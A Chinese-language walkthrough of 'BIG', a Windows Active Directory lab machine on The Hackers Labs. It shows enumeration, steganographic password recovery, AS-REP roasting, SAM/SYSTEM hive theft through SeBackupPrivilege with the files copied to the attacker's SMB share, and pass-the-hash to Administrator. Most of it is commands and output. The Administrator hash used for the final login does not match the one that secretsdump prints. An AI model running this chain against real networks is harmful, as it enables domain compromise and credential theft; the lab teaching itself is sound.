靶场:The Hackers Labs
地址:https://thehackerslabs.com/b-i-g/
系统:windows
内容:blooghound使用、SeBackupPrivilege权限利用
扫描端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 21:59 CST
Nmap scan report for 192.168.56.155
Host is up (0.00077s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-10 05:00:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:D4:4D:EB (VMware)
Service Info: Host: BIG; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: BIG, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:d4:4d:eb (VMware)
| smb2-time:
| date: 2024-11-10T05:00:56
|_ start_date: 2024-11-10T04:55:36
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.66 seconds
开了80端口,扫一下http的目录。
gobuster dir -u http://$IP -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.asp,.aspx,.txt -b 401,403,404,500 -o 80.log
...
/images (Status: 301) [Size: 152] [--> http://192.168.56.155/images/]
/Images (Status: 301) [Size: 152] [--> http://192.168.56.155/Images/]
/contents (Status: 301) [Size: 154] [--> http://192.168.56.155/contents/]
/IMAGES (Status: 301) [Size: 152] [--> http://192.168.56.155/IMAGES/]
/songs (Status: 301) [Size: 151] [--> http://192.168.56.155/songs/]
/Contents (Status: 301) [Size: 154] [--> http://192.168.56.155/Contents/]
/Songs (Status: 301) [Size: 151] [--> http://192.168.56.155/Songs/]
在contents目录下发现notify.txt文件,里面提示了用户名music,以及有个密码用MD5加密了。
─$ curl http://$IP/contents/notify.txt
Who the hell did you hire to create the website!
Hiding keys in MD5 again!
I'm going to fire that guy
music
在songs目录下有4个文件,其中Skyisthelimit.txt其实是密码文件,其余3个是歌词。
打开主页,查看源码,有一段注释。根据官方WP提示,这段注释的MD5就是某密码,这真是神先操作。
<!DOCTYPE html>
<html>
<head>
<style>
/* It was all a dream */
body {
background-image: url('big1.jpg');
background-size: cover;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
</head>
<body>
<h1>Music</h1>
<p>I keep it music music, I eat that lunch (Yeah)</p>
</body>
</html>
得到一段密码。
└─$ echo -n "It was all a dream" |md5sum
99ae77c0c0faf78b872f9f452e3eaa24
在images目录下发现4个图片,下载后其中big2.jpg可以解压出文件,解压密码就是刚才得到的密码。
└─$ steghide extract -sf big2.jpg
Enter passphrase:
wrote extracted data to "frase.txt".
得到的文件里是另一个密码。
└─$ cat frase.txt
Bigpoppa1972
这个密码就是用户music的,检测一下,可以登录。
└─$ crackmapexec smb $IP -u music -p $(cat frase.txt)
SMB 192.168.56.155 445 BIG [*] Windows 10 / Server 2016 Build 14393 x64 (name:BIG) (domain:bbr.thl) (signing:True) (SMBv1:False)
SMB 192.168.56.155 445 BIG [+] bbr.thl\music:Bigpoppa1972
└─$ crackmapexec winrm $IP -u music -p $(cat frase.txt)
SMB 192.168.56.155 5985 BIG [*] Windows 10 / Server 2016 Build 14393 (name:BIG) (domain:bbr.thl)
HTTP 192.168.56.155 5985 BIG [*] http://192.168.56.155:5985/wsman
WINRM 192.168.56.155 5985 BIG [+] bbr.thl\music:Bigpoppa1972 (Pwn3d!)
利用music用户收集bloodhound信息。
└─$ netexec ldap $IP -u 'music' -p 'Bigpoppa1972' --bloodhound --collection All --dns-server $IP
SMB 192.168.56.155 445 BIG [*] Windows 10 / Server 2016 Build 14393 x64 (name:BIG) (domain:bbr.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.155 389 BIG [+] bbr.thl\music:Bigpoppa1972
LDAP 192.168.56.155 389 BIG Resolved collection methods: trusts, rdp, session, objectprops, group, container, psremote, localadmin, dcom, acl
LDAP 192.168.56.155 389 BIG Done in 00M 00S
LDAP 192.168.56.155 389 BIG Compressing output into /home/kali/.nxc/logs/BIG_192.168.56.155_2024-11-12_080032_bloodhound.zip
在blooghound中,选择查找存在AS-REP漏洞的用户,显示song用户。
使用impacket脚本可以得到song用户的hash。
└─$ impacket-GetNPUsers bbr.thl/song:Bigpoppa1972
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Cannot authenticate song, getting its TGT
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$song@BBR.THL:49281aed4411ba3db90e463c3a4944ea$c2b0a9de855a1717cbad6343efaf10610204dbd547ffdf38861aa1191184943ecaf2486f0a72e2300f66d269304468fa36fcac5c54d41db26704710664568e4663ec846228eb68b9cd17e444f8181b11791ea8b1b8c8de79e8e1de9fda2de1c81e2acd544d5fd3e3ac87faf87c115d8bf150dccd6f4b9bdca4dda08fc2f628d58c866ec9f5ebfa6ad6b9bcf15cd575d8d9ed5d87a959f21f234a10c7a637280518d1094b3615464572c74367bf735d2672a9c107fe1d40ccd5c1670c665406a702d4c57db7993b40cef10349b0c3d51898d74dde12e2ab62d5d7c17a6fd638c5afdc
将以上hash保存到文件中,使用最开始得到的密码文件进行破解,得到song用户的密码。
└─$ john --wordlist=Skyisthelimit.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Passwordsave@ ($krb5asrep$23$song@BBR.THL)
1g 0:00:00:00 DONE (2024-11-10 11:52) 33.33g/s 6700p/s 6700c/s 6700C/s 123456..qwerty123456
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
以song用户登录,查看权限,发现具有SeBackupPrivilege权限。
└─$ evil-winrm -i $IP -u song -p Passwordsave@
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TEMP\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\TEMP\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP\Documents> dir
Directory: C:\Users\TEMP\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/10/2024 10:56 AM 36864 sam
-a---- 11/10/2024 10:56 AM 10543104 system
*Evil-WinRM* PS C:\Users\TEMP\Documents> cp sam \\192.168.56.101\kal
*Evil-WinRM* PS C:\Users\TEMP\Documents> cp system \\192.168.56.101\kali
在本地打开靶机导出的sam和system,得到administrator的hash。
└─$ impacket-secretsdump LOCAL -system system -sam sam
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbb33617256ea48219d9d3d01766b7a9e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb1c50a48c37e053d2045cd5b55cd2f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
拿到系统权限。
└─$ evil-winrm -i $IP -u administrator -H 5d48bcf84aea999fb1ade06970a81237
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
bbr\administrator